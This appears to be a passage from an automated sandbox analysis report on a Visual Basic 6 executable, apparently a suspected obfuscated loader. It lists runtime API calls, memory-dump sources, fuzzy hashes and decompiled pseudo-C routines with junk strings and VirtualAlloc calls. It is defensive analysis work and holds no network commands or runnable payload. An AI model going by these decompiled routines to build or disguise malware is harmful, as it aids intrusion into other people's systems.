                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B278,000000A0,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CC8F
                            • __vbaNew2.MSVBVM60(0040A678,Hr_,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CCB6
                            • __vbaObjSet.MSVBVM60(?,00000000,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CCEF
                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B268,000001A0,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CD3C
                            • __vbaNew2.MSVBVM60(0040A678,Hr_,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CD63
                            • __vbaObjSet.MSVBVM60(?,00000000,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CD9C
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B278,00000128,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CDE9
                            • __vbaNew2.MSVBVM60(0040A678,Hr_,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CE10
                            • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CE49
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B278,000000F0,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CE93
                            • __vbaLateIdCallLd.MSVBVM60(00000008,?,00000000,00000000,?,?,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CEB5
                            • __vbaI4Var.MSVBVM60(?), ref: 0040CEC4
                            • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AF38,00000704), ref: 0040CF56
                            • __vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040CF80
                            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?), ref: 0040CF8E
                            • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AF08,000002B4), ref: 0040CFC5
                            • __vbaVarForInit.MSVBVM60(?,?,?,00000002,00000002,00000002), ref: 0040D039
                            • __vbaVarDup.MSVBVM60(?,?,?,00000002,00000002,00000002), ref: 0040D069
                            • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AF38,00000708), ref: 0040D0DD
                            • __vbaFreeVar.MSVBVM60(00000000,004011C8,0040AF38,00000708), ref: 0040D0F7
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040D10F
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D148
                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B278,00000068), ref: 0040D18F
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040D1B6
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D1EF
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B288,00000090), ref: 0040D23C
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040D263
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D29C
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B268,000000F8), ref: 0040D2E6
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040D30D
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D346
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B268,000001DC), ref: 0040D390
                            • __vbaStrMove.MSVBVM60(00000000,?,0040B268,000001DC), ref: 0040D40E
                            • __vbaChkstk.MSVBVM60(00000003), ref: 0040D449
                            • __vbaChkstk.MSVBVM60(?,?,418E7D50,?,?,?,00000008,00000003), ref: 0040D48D
                            • __vbaFreeStr.MSVBVM60(?,?,?,00000008,00000003), ref: 0040D4AF
                            • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,00000008,00000003), ref: 0040D4C6
                            • __vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0040D4DE
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040D4F9
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D532
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B268,00000048), ref: 0040D576
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040D59D
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D5D6
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B278,000000E8), ref: 0040D623
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040D64A
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D683
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B288,00000058), ref: 0040D6C7
                            • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040D6E9
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040D704
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D73D
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B278,00000060), ref: 0040D784
                            • __vbaI4Var.MSVBVM60(?), ref: 0040D7AB
                            • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AF38,0000070C,?,?,?,?,?), ref: 0040D870
                            • __vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?,?,?,?,?,?), ref: 0040D8A3
                            • __vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0040D8BB
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040D8D6
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D90F
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B268,00000170), ref: 0040D959
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040D980
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D9B9
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B278,00000110), ref: 0040DA06
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040DA2D
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040DA66
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B278,00000070), ref: 0040DAAD
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040DAD4
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040DB0D
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B278,00000128), ref: 0040DB5A
                            • __vbaChkstk.MSVBVM60(?,?,?), ref: 0040DBD7
                            • __vbaChkstk.MSVBVM60(00005D72,?,?,?,?), ref: 0040DBFA
                            • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,?), ref: 0040DC2B
                            • __vbaFreeVar.MSVBVM60 ref: 0040DC39
                            • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AF38,00000710), ref: 0040DC75
                            • __vbaVarMove.MSVBVM60(00000000,004011C8,0040AF38,00000710), ref: 0040DC92
                            • __vbaVarForNext.MSVBVM60(?,?,?), ref: 0040DCA9
                            • __vbaFreeVarList.MSVBVM60(00000002,?,?,0040DD63), ref: 0040DD42
                            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0040DD4D
                            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0040DD55
                            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0040DD5D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __vba$CheckHresult$New2$Free$ChkstkList$Move$CallLate$#543InitNext
                            • String ID: 21:21:21$Hr_$RRETS$Underbevidsthed$overstiges$z_$BZ$T5
                            • API String ID: 2874494357-2667050392
                            • Opcode ID: f9123990f763b1f9a9e2ec036698afe0db37bd7990c470875aeac731a97059e6
                            • Instruction ID: c43cb0ca606f7c87da34081daf378ed6ef0b602ba52e7d510a8030c21cca7901
                            • Opcode Fuzzy Hash: f9123990f763b1f9a9e2ec036698afe0db37bd7990c470875aeac731a97059e6
                            • Instruction Fuzzy Hash: 61F2E37194022C9FDB21DF90CC49BDDBBB4BB08304F1045EAE549BB2A1CBB95AC59F58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 46%
                            			E0040ECB8(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a52) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				void* _v36;
                            				void* _v52;
                            				void* _v56;
                            				char _v60;
                            				char _v64;
                            				char _v80;
                            				intOrPtr* _v84;
                            				signed int _v88;
                            				intOrPtr* _v96;
                            				signed int _v100;
                            				char* _t39;
                            				signed int _t43;
                            				char* _t44;
                            				char* _t46;
                            				intOrPtr _t66;
                            
                            				_push(0x4012a6);
                            				_push( *[fs:0x0]);
                            				 *[fs:0x0] = _t66;
                            				_push(0x50);
                            				L004012A0();
                            				_v12 = _t66;
                            				_v8 = 0x401250;
                            				L004013E4();
                            				L004013E4();
                            				if( *0x410010 != 0) {
                            					_v96 = 0x410010;
                            				} else {
                            					_push("Hr_");
                            					_push(0x40a678);
                            					L004013DE();
                            					_v96 = 0x410010;
                            				}
                            				_t39 =  &_v60;
                            				L004013CC();
                            				_v84 = _t39;
                            				_t43 =  *((intOrPtr*)( *_v84 + 0x120))(_v84,  &_v64, _t39,  *((intOrPtr*)( *((intOrPtr*)( *_v96)) + 0x310))( *_v96));
                            				asm("fclex");
                            				_v88 = _t43;
                            				if(_v88 >= 0) {
                            					_v100 = _v100 & 0x00000000;
                            				} else {
                            					_push(0x120);
                            					_push(0x40b278);
                            					_push(_v84);
                            					_push(_v88);
                            					L004013D8();
                            					_v100 = _t43;
                            				}
                            				_push(0);
                            				_push(0);
                            				_push(_v64);
                            				_t44 =  &_v80;
                            				_push(_t44); // executed
                            				L004013BA(); // executed
                            				_push(_t44);
                            				L0040142C();
                            				L0040145C();
                            				_push(_t44);
                            				_push(L"Koinciderede4");
                            				_push(L"Sequences");
                            				_push(L"TANKRENSNING"); // executed
                            				L0040134E(); // executed
                            				L00401462();
                            				_push( &_v64);
                            				_t46 =  &_v60;
                            				_push(_t46);
                            				_push(2);
                            				L004013C6();
                            				L00401450();
                            				_push(E0040EE13);
                            				L00401450();
                            				L00401450();
                            				return _t46;
                            			}




















                            0x0040ecbd
                            0x0040ecc8
                            0x0040ecc9
                            0x0040ecd0
                            0x0040ecd3
                            0x0040ecdb
                            0x0040ecde
                            0x0040eceb
                            0x0040ecf6
                            0x0040ed02
                            0x0040ed1c
                            0x0040ed04
                            0x0040ed04
                            0x0040ed09
                            0x0040ed0e
                            0x0040ed13
                            0x0040ed13
                            0x0040ed37
                            0x0040ed3b
                            0x0040ed40
                            0x0040ed4f
                            0x0040ed55
                            0x0040ed57
                            0x0040ed5e
                            0x0040ed7a
                            0x0040ed60
                            0x0040ed60
                            0x0040ed65
                            0x0040ed6a
                            0x0040ed6d
                            0x0040ed70
                            0x0040ed75
                            0x0040ed75
                            0x0040ed7e
                            0x0040ed80
                            0x0040ed82
                            0x0040ed85
                            0x0040ed88
                            0x0040ed89
                            0x0040ed91
                            0x0040ed92
                            0x0040ed9c
                            0x0040eda1
                            0x0040eda2
                            0x0040eda7
                            0x0040edac
                            0x0040edb1
                            0x0040edb9
                            0x0040edc1
                            0x0040edc2
                            0x0040edc5
                            0x0040edc6
                            0x0040edc8
                            0x0040edd3
                            0x0040edd8
                            0x0040ee05
                            0x0040ee0d
                            0x0040ee12

                            APIs
                            • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040ECD3
                            • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040ECEB
                            • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040ECF6
                            • __vbaNew2.MSVBVM60(0040A678,Hr_,?,?,?,?,004012A6), ref: 0040ED0E
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040ED3B
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B278,00000120), ref: 0040ED70
                            • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040ED89
                            • __vbaStrVarMove.MSVBVM60(00000000), ref: 0040ED92
                            • __vbaStrMove.MSVBVM60(00000000), ref: 0040ED9C
                            • #690.MSVBVM60(TANKRENSNING,Sequences,Koinciderede4,00000000,00000000), ref: 0040EDB1
                            • __vbaFreeStr.MSVBVM60(TANKRENSNING,Sequences,Koinciderede4,00000000,00000000), ref: 0040EDB9
                            • __vbaFreeObjList.MSVBVM60(00000002,?,?,TANKRENSNING,Sequences,Koinciderede4,00000000,00000000), ref: 0040EDC8
                            • __vbaFreeVar.MSVBVM60(Koinciderede4,00000000,00000000), ref: 0040EDD3
                            • __vbaFreeVar.MSVBVM60(0040EE13,Koinciderede4,00000000,00000000), ref: 0040EE05
                            • __vbaFreeVar.MSVBVM60(0040EE13,Koinciderede4,00000000,00000000), ref: 0040EE0D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __vba$Free$Move$#690CallCheckChkstkHresultLateListNew2
                            • String ID: Hr_$Koinciderede4$Sequences$TANKRENSNING
                            • API String ID: 1502117440-868075879
                            • Opcode ID: 1161e6cdc57223d7b7ed55057baeb01b7733daf3a31261dced81228f3d449e91
                            • Instruction ID: 289d100048f1af0f9b7d9eb632195d409d9c08206fbf64ec76c86ae12ea688a2
                            • Opcode Fuzzy Hash: 1161e6cdc57223d7b7ed55057baeb01b7733daf3a31261dced81228f3d449e91
                            • Instruction Fuzzy Hash: A8310771940208ABDB10EBD1DC46FDDBBB8EF08708F50453AF502BA1E2DBB869558B58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: #100
                            • String ID: VB5!6&*
                            • API String ID: 1341478452-3593831657
                            • Opcode ID: 489e1469ce27953c4e6c17ca89dfb718f3be9cec3107fbfbbe1377de5df93a96
                            • Instruction ID: 896313c0c2cac4acd06958691a140b6ac2204eb8aa548f8131baf0a2388163e5
                            • Opcode Fuzzy Hash: 489e1469ce27953c4e6c17ca89dfb718f3be9cec3107fbfbbe1377de5df93a96
                            • Instruction Fuzzy Hash: 4321036144E7C09FC70387788D652913FB0AE53364B1A46EBC4C2CF5F3D629591AC72A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 004034B5
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 4bf1d7f247456607eb27fcf9eb80681a308e015cc53df76d69220112f8eb8a79
                            • Instruction ID: 1210306dc8b919ffd17ffad1434a9886d1d2288eb39fc55c7b5d9458ee25738f
                            • Opcode Fuzzy Hash: 4bf1d7f247456607eb27fcf9eb80681a308e015cc53df76d69220112f8eb8a79
                            • Instruction Fuzzy Hash: 6841CD1196CA548AD717BD6084801317F88FFA3257321CFBB84A3A31D2EB3E4F476185
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 004034B5
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 8797228fe6a66524dcab2deb8dd5ffbeb39f4808529cfcbdd96b7988dcd58a76
                            • Instruction ID: f7f7f1f18da10a84452e54b5b78038fedd6edae819318392730bc1251c6c1f21
                            • Opcode Fuzzy Hash: 8797228fe6a66524dcab2deb8dd5ffbeb39f4808529cfcbdd96b7988dcd58a76
                            • Instruction Fuzzy Hash: 1C41CE1191CA548AD716BE3084801357F84EF6761B3209BBFC4A3B31E1EB3E4B47A285
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 004034B5
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 61e34c4da88afb07a0235c336303caeb338143c295571c061ab6b49238fbd408
                            • Instruction ID: 789dcc4135170c2eb6c18e808a1b7d0f672996909903c1dfbae09513d1afb185
                            • Opcode Fuzzy Hash: 61e34c4da88afb07a0235c336303caeb338143c295571c061ab6b49238fbd408
                            • Instruction Fuzzy Hash: 3941CE5191CA548AD717BD7084C01717F88EFA365B3208FBB84A3A61A2EB3F4B4B61C5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 004034B5
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 061877b4887c464483b2a04556d298040ad4637cf663c55d069078468510a337
                            • Instruction ID: dffa124a3aff75bddf009d2191b10223c4266b4df752f38e54df98191808447d
                            • Opcode Fuzzy Hash: 061877b4887c464483b2a04556d298040ad4637cf663c55d069078468510a337
                            • Instruction Fuzzy Hash: E951BC1196CA548AD717BA6084801357F84FFA33573218FBB84A3B70E2EB3E0B476585
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 004034B5
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: b8355780a43afebfb3d6208776f036aacd55530679e476454cd2e1260b45fc92
                            • Instruction ID: 07d6f771900d761ea62448135b0a4b6ff90db08b80531e82d84febbb9081f4de
                            • Opcode Fuzzy Hash: b8355780a43afebfb3d6208776f036aacd55530679e476454cd2e1260b45fc92
                            • Instruction Fuzzy Hash: 5741DF1192CB548AD717BE3084C01317F88EF632573218BBB84A3A31A2E73E0B4765C5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 004034B5
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 50a72bd4f908bac3c3dd0c080238f28dedfe35524f06fd36606ff9a2b96a130b
                            • Instruction ID: 51732330f5663d406ba448a68c0a5520bf4efcce1a8e83a07848d93ba61f2fbc
                            • Opcode Fuzzy Hash: 50a72bd4f908bac3c3dd0c080238f28dedfe35524f06fd36606ff9a2b96a130b
                            • Instruction Fuzzy Hash: 4A41DD1196CA548AD717BE7084C01357F84EF6725B3219BBB84A3B31A2EB3F0B4B61C5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 004034B5
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 66d176046beee16cad0880dad98ccd3addbfefc6a3ad1d3e5bdd690aaef5fbd8
                            • Instruction ID: 4b33c4e54f2d5ae3662c4bc3d602ca6de3c71c6fd6c79bb856e632322592790b
                            • Opcode Fuzzy Hash: 66d176046beee16cad0880dad98ccd3addbfefc6a3ad1d3e5bdd690aaef5fbd8
                            • Instruction Fuzzy Hash: CE41CF1195CA548AD717BE7084801357F84EF672173209BBFC4A3A3192D73E4B4BA285
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                            • Instruction ID: d394a65342a6a254380257ba0734a19f866dc21ad068f5b1ddaac111a7468d93
                            • Opcode Fuzzy Hash: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                            • Instruction Fuzzy Hash: F641279025E2D4EFC71B47B64CBA2813FE1AE07108B1A88EFD6D54B8A3E555241FC727
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                            • Instruction ID: 0ef76ab4ed2bcdf07a831812e9108315abc5032b0251afc9fc56c28be75d868b
                            • Opcode Fuzzy Hash: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                            • Instruction Fuzzy Hash: 5E11DAB150E3E59FCB174B748CB52527FB0AF1B20070A44EBD4819F8A7E268281ED727
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                            • Instruction ID: 3a4f40afd7daac755765d0dbc513794409bb1d663c47dbf88c845af7c1cdfe86
                            • Opcode Fuzzy Hash: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                            • Instruction Fuzzy Hash: CBF07A70124154EFCB06CF74D8A5A063BE1AF5B3407451CDAD9108F475D736B865EB12
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 96%
                            			E0040DD82(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a20) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				void* _v40;
                            				void* _v44;
                            				intOrPtr _v56;
                            				char _v68;
                            				char _v76;
                            				signed int _v80;
                            				signed int _v92;
                            				signed int _v96;
                            				signed int _v100;
                            				signed int _v104;
                            				signed int _v108;
                            				signed int _v112;
                            				signed int _v116;
                            				signed int _v120;
                            				signed int _v124;
                            				signed int _v128;
                            				signed int _v132;
                            				signed int _v136;
                            				signed int _v140;
                            				signed int _v144;
                            				signed int _v148;
                            				signed int _v152;
                            				signed int _v156;
                            				signed int _v160;
                            				signed int _v164;
                            				signed int _v168;
                            				signed int _v172;
                            				signed int _v176;
                            				signed int _v180;
                            				signed int _v184;
                            				signed int _v188;
                            				signed int _v192;
                            				signed int _v196;
                            				signed int _v200;
                            				signed int _v204;
                            				char _t226;
                            				char* _t228;
                            				void* _t325;
                            				void* _t327;
                            				intOrPtr _t328;
                            
                            				_t328 = _t327 - 0xc;
                            				 *[fs:0x0] = _t328;
                            				L004012A0();
                            				_v16 = _t328;
                            				_v12 = 0x4011d8;
                            				_v8 = 0;
                            				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t325);
                            				L00401420();
                            				L004013E4();
                            				_push(0x11);
                            				_push(0x40b2c8);
                            				_t226 =  &_v68;
                            				_push(_t226);
                            				L004013A2();
                            				_v80 = _v80 & 0x00000000;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v92 = _t226;
                            				} else {
                            					_v92 = _v92 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 1;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v96 = _t226;
                            				} else {
                            					_v96 = _v96 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 2;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v100 = _t226;
                            				} else {
                            					_v100 = _v100 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 3;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v104 = _t226;
                            				} else {
                            					_v104 = _v104 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 4;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v108 = _t226;
                            				} else {
                            					_v108 = _v108 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 5;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v112 = _t226;
                            				} else {
                            					_v112 = _v112 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 6;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v116 = _t226;
                            				} else {
                            					_v116 = _v116 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 7;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v120 = _t226;
                            				} else {
                            					_v120 = _v120 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 8;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v124 = _t226;
                            				} else {
                            					_v124 = _v124 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 9;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v128 = _t226;
                            				} else {
                            					_v128 = _v128 & 0x00000000;
                            				}
                            				L00401396();
